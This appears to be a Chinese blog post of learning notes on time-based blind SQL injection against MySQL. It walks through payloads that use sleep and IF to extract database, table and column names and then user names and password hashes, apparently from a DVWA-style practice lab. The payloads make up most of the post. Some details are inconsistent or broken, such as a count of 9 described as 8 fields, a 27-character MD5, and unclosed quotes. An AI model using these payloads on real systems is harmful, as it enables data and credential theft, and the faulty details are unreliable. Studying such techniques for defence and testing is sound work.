vlambda博客
学习文章列表

sql注入笔记:基于时间延迟的盲注

在陷入混乱的一瞬间,灯火、信仰、统统派不上用场。



大致原理:

遇到一些可能没有报错或结果的疑似sql注入点,可以采用sleep函数延时和if判定的方式进行注入,应该属于盲注的一种,很好理解

就是猜对了就执行sleep,没对就不执行



使用到的函数:

sleep()

用法(语法):sleep(duration),其中duration的单位是秒。

ascii(string)

功能: 数据库字符集返回string的第一个字节的十进制表示。

substr(string,start [,length])

第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

count(column_name)

函数返回指定列的值的数目(NULL 不计入)。

limit [offset,] rows

offset是偏移量,表示我们现在需要的数据是跳过多少行数据之后的,可以忽略;

rows表示我们现在要拿多少行数据。

IF( expr1 , expr2 , expr3 )

expr1 的值为 TRUE,则返回值为 expr2 

expr1 的值为FALSE,则返回值为 expr3



注入流程

1,常规手段判断注入点

1' and 1=1#

2,判断注入类型

1' and sleep(5) # #延迟1 and sleep(5) # #没有延迟 #所以得出存在字符型注入



3,猜解当前数据库名

猜解数据库名的长度:

1' and if(length(database())=1,sleep(5),1) # #没有延迟1' and if(length(database())=4,sleep(5),1) # #延迟 #说明数据库名长度为4个字符。


采用二分法猜解数据库名(传统艺能):

1' and if(ascii(substr(database(),1,1))>97,sleep(5),1) # #延迟1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# #没有延迟1' and if(ascii(substr(database(),1,1))>100,sleep(5),1) # #没有延迟 #说明数据库的第一个字符为小写字母d(ASCII码:100) #重复上述步骤,就能猜解出数据库名。


4,猜解数据库的表名

先猜解数据库中表的数量:

1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) # #没有延迟1' and if(select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1) # #延迟 #说明数据库中有两个表。

接着猜解表名长度:

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # #没有延迟1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # #延迟 #说明第一个表名的长度为9个字符。

然后猜解表名:

1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))>97,sleep(5),1) # #延迟1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))<100,sleep(5),1) # #没有延迟1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=103,sleep(5),1) # #延迟 #表名的第一个字符为g(ASCII码:103),照此方法依次猜出表名。例中,得出这两个表依次为:guestbook、users.

5,由表名猜字段名

先猜字段数:

1' and if((select count(column_name) from information_schema.columns where table_name= “users”)=1,sleep(5),1) # #没有延迟1' and if((select count(column_name) from information_schema.columns where table_name= “users”)=9,sleep(5),1) # #延迟 #说明users表有8个字段。

猜字段名


1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”userslimit 0,1),1,1)))>97, sleep(5),0) # #延迟1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))<105, sleep(5),0) # #延迟1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”userslimit 0,1),1,1)))=117, sleep(5),0) # #延迟 #依次类推可得表中所有字段名

例中:字段名为:user、password.

6,猜解user和password的值的长度

第一个用户名字符长

1' and if((select (length(substr((select user from users limit 0,1),1))=1) ,sleep(5),1) # #没有延迟1' and if((select (length(substr((select user from users limit 0,1),1))=5) ,sleep(5),1) # #延迟


第一个用户名的password的md5字段长


1' and if((select (length(substr((select password from users limit 0,1),1))=1) ,sleep(5),1) # #没有延迟1' and if((select (length(substr((select password from users limit 0,1),1))=27) ,sleep(5),1) # #延迟


第一个用户名:

1' and if(select ascii(substr((select user from users limit 0,1),1,1))>97,sleep(5),1) # 没有延迟1' and if(select ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1) # 延迟 #依次猜解得第一个用户名为admin

第一个用户的密码


1' and if(select ascii(substr((select password from users limit 0,1),1,1))>97,sleep(5),1) # #没有延时1' and if(select ascii(substr((select password from users limit 0,1),1,1))=53,sleep(5),1) # #延时 #依次猜解密码的md5值

















一键关注带来更多干货【也许】